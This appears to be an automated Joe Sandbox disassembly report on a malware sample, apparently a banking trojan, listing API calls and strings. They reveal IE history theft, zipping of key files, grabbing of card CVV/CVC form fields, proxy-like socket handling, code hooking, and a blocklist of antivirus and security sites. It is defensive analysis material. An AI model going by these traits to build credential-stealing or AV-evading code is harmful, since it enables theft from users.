                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$LastPath$#680BackslashCreateDirectoryFileFolderMakeSystem$AttributesFindModeNext
                                                                                                                                                                                                              • String ID: .txt$.zip$61C5C0CB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 4136576029-79601650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 012E4925
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,url%i,00000001), ref: 012E494D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,774D3490), ref: 012E4987
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49A9
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49B5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,IE history:,0000000C,012E58F1,00000000), ref: 012E49C9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49EB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E49F7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325C1C,00000001,00000000,00000000), ref: 012E4A0B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E4A19
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4A43
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4A4F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4A64
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 012E4A74
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4A88
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4A94
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4AA8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4AB6
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,url%i,00000002), ref: 012E4AD5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E4AEC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                              • API String ID: 757183407-427538202
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304037
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01304075
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130407F
                                                                                                                                                                                                              • #680.SHELL32 ref: 01304087
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01304098
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0130409F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?), ref: 013040FD
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0130410C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304137
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,keys%i.zip,00000000), ref: 01304197
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C,?,00000000), ref: 013041D7
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,path%i.txt,00000000), ref: 01304237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorLast_snprintf$#680AttributesCreateDirectoryFileFolderMakeSystem
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 3788559835-942948650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(00000000,00000000), ref: 012EDA2D
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 012EDA3E
                                                                                                                                                                                                                • Part of subcall function 012ED970: GetComputerNameA.KERNEL32(0132F588,?,774CF550,775B7390,774D0A60,?,?,012F76EC), ref: 012ED987
                                                                                                                                                                                                                • Part of subcall function 012ED970: lstrlenA.KERNEL32(0132F588,?,?,012F76EC), ref: 012ED992
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5A0,MSCTF.Shared.MAPPING.%x,?,?,?,012F76EC), ref: 012ED9D2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F54C,MSCTF.Shared.MAPPING.%x,774D0A60,?,?,?,012F76EC), ref: 012ED9E2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5DC,MSCTF.Shared.MAPPING.%x,?,?,?,?,012F76EC), ref: 012ED9F2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F670,MSCTF.Shared.MUTEX.%x,?,?,?,?,?,012F76EC), ref: 012ED9FF
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F630,MSCTF.Shared.MUTEX.%x,774D0A60,?,?,?,?,?,012F76EC), ref: 012EDA0C
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0132F5A0), ref: 012EDA6A
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDA83
                                                                                                                                                                                                                • Part of subcall function 012E9020: SetThreadDesktop.USER32(?,774CF590,774C16B0,?), ref: 012E902F
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDC.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9037
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDeviceCaps.GDI32(00000000,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9048
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9059
                                                                                                                                                                                                                • Part of subcall function 012E9020: CreateCompatibleBitmap.GDI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9070
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 012E90B2
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 012E90C2
                                                                                                                                                                                                                • Part of subcall function 012E9020: DeleteObject.GDI32(00000000), ref: 012E90C5
                                                                                                                                                                                                                • Part of subcall function 012E9020: ReleaseDC.USER32(00000000,00000000), ref: 012E90CE
                                                                                                                                                                                                                • Part of subcall function 012E9020: HeapFree.KERNEL32(00000000,00000000,?), ref: 012E9129
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0132F54C), ref: 012EDAB0
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDAC3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0132F670), ref: 012EDAE1
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012EDAFF
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 012EDB20
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0132F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012EDB3D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 012EDB47
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 012EDB61
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0132F630), ref: 012EDB79
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012EDB97
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 012EDBB8
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0132F630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012EDBD5
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012EDBDF
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 012EDBFD
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 012EDC10
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 012EDC23
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,0132F5DC), ref: 012EDC39
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapCloseCompatibleComputerCountDeleteDesktopErrorHandleLastLookupNameObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 3555772620-820036962
                                                                                                                                                                                                              • Opcode ID: b107a66f44ab06e5c9eee913ef003d5672f73f04cf37d5b1711aec1316d6c6ad
                                                                                                                                                                                                              • Instruction ID: a1371aec2c6f52646a8e7d6f323f9b5e0e22f0cf592f08aea2ea855dd7ec85b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b107a66f44ab06e5c9eee913ef003d5672f73f04cf37d5b1711aec1316d6c6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B515471B9431ABAFB30AFA59C4AF997BBCAB44F51F144119F700BA1C4E6F0A5008B65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000000,00000000,?,01324DD0,0132AE48,000000FF,?,012FA660,00000000,00000000), ref: 012FA376
                                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,012FA660,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA37D
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,012FA660,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA386
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(012FA660,00000008,00000040,?,?,012FA660,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000), ref: 012FA3A7
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 012FA3C6
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 012FA3E2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000004), ref: 012FA3F8
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 012FA406
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 012FA411
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 012FA424
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 012FA435
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 012FA444
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 012FA453
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 012FA462
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000006,?), ref: 012FA46A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 012FA47D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 012FA48E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 012FA49D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 012FA4A9
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 012FA4B3
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000002), ref: 012FA4BB
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 012FA4C2
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(?), ref: 012FA4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 012FA505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(012FA660,00000008,00000000,012FA660), ref: 012FA51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2984368831-0
                                                                                                                                                                                                              • Opcode ID: 395d74a5eca2fe3ad36ce7774bb108e070409da57b19d090f743410ea75db712
                                                                                                                                                                                                              • Instruction ID: 66ba2ac43e897611f305aaf936e3eb1ee29d20ad38cbc0c5832e8fbfd533977f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 395d74a5eca2fe3ad36ce7774bb108e070409da57b19d090f743410ea75db712
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A512171501219AFEB21AF74CC46FAE77ACFF49720F15452CF945E7280DA78A941CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE433
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE441
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE44D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE45B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE467
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE479
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,&domain=letitbit.net&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE48F
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,01329A24,?,012F8A44,?,?,?,?,?), ref: 012FE4A2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?), ref: 012FE50B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 012FE512
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-00000011,?,?,?,?,?,?,?,?,?), ref: 012FE522
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FE580,00000000,00000000,00000000), ref: 012FE548
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FE560
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FE571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                              • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                              • API String ID: 1632825432-2817208116
                                                                                                                                                                                                              • Opcode ID: 4038a09ae4d68e73ecb7025ec9288ae78c752d7f3b714c73885eb78e492a7ff8
                                                                                                                                                                                                              • Instruction ID: c763a11a08e037e16b6e992ed061a55fb5ff5a7247da2e324c0b1c74afbe2876
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4038a09ae4d68e73ecb7025ec9288ae78c752d7f3b714c73885eb78e492a7ff8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50412A31A5272B27E333162C7C5EFBABA9D8F42701F1B412CEF4097261FA51C60582A4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 012F9B39
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F9B42
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 012F9B4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F9B4F
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 012F9B75
                                                                                                                                                                                                              • send.WS2_32(?,01329E4C,00000002,00000000), ref: 012F9BCC
                                                                                                                                                                                                              • send.WS2_32(?,0132E1CC,00000002,00000000), ref: 012F9BF2
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 012F9C18
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 012F9C92
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000005), ref: 012F9CC7
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 012F9D0D
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 012F9D24
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 012F9D37
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 012F9D47
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 012F9D5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000005), ref: 012F9D67
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F9D6E
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 012F9D7A
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 012F9D9C
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 012F9DB6
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 012F9DD0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00019970,?,00000000,00000000), ref: 012F9DEA
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 012F9CBC
                                                                                                                                                                                                                • Part of subcall function 012F98F0: shutdown.WS2_32(?,00000001), ref: 012F990B
                                                                                                                                                                                                                • Part of subcall function 012F98F0: shutdown.WS2_32(?,00000001), ref: 012F9910
                                                                                                                                                                                                                • Part of subcall function 012F98F0: recv.WS2_32(?,?,00000400,00000000), ref: 012F992F
                                                                                                                                                                                                                • Part of subcall function 012F98F0: recv.WS2_32(?,?,00000400,00000000), ref: 012F9945
                                                                                                                                                                                                                • Part of subcall function 012F98F0: closesocket.WS2_32(?), ref: 012F9959
                                                                                                                                                                                                                • Part of subcall function 012F98F0: closesocket.WS2_32(?), ref: 012F995C
                                                                                                                                                                                                                • Part of subcall function 012F98F0: ExitThread.KERNEL32 ref: 012F9960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F9DFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699211285-0
                                                                                                                                                                                                              • Opcode ID: 46398b5be5ee41a6310c5320a5c02e5130c9ba127e3661bffa599cd5e1023af9
                                                                                                                                                                                                              • Instruction ID: 57be73e417b910b671f74b323372ad57bbd3b7f9f95958805f5cddf419f144ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46398b5be5ee41a6310c5320a5c02e5130c9ba127e3661bffa599cd5e1023af9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B491C3B1214342AEE720EF78CC85F6BBB9CAB94708F54582DF782961C1D674D584CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avast.com,?,?,012E626C), ref: 012E611B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kaspersky,?,?,012E626C), ref: 012E612B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,drweb,?,?,012E626C), ref: 012E6137
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,eset.com,?,?,012E626C), ref: 012E6143
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,antivir,?,?,012E626C), ref: 012E614F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avira,?,?,012E626C), ref: 012E615B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virustotal,?,?,012E626C), ref: 012E6167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virusinfo,?,?,012E626C), ref: 012E6173
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,012E626C), ref: 012E617F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,trendsecure,?,?,012E626C), ref: 012E618B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,anti-malware,?,?,012E626C), ref: 012E6197
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,.comodo.com,?,?,012E626C), ref: 012E61A3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: d7becac9cefb5414a1092e57df051890de3c3ba5478e5cdbc7b5f7f11ff5a87f
                                                                                                                                                                                                              • Instruction ID: e2d1e2114ebab0ef22ecd9b985097295d77b5a040222e51bbd58256687bf8c77
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7becac9cefb5414a1092e57df051890de3c3ba5478e5cdbc7b5f7f11ff5a87f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B701597239276728BE13756E4C15EEF45CC0EA5CCCB814628E618E930BE687C20204B5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avast.com,?,?,012E62EC), ref: 012E61CB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,kaspersky,?,?,012E62EC), ref: 012E61DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,drweb,?,?,012E62EC), ref: 012E61E7
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,eset.com,?,?,012E62EC), ref: 012E61F3
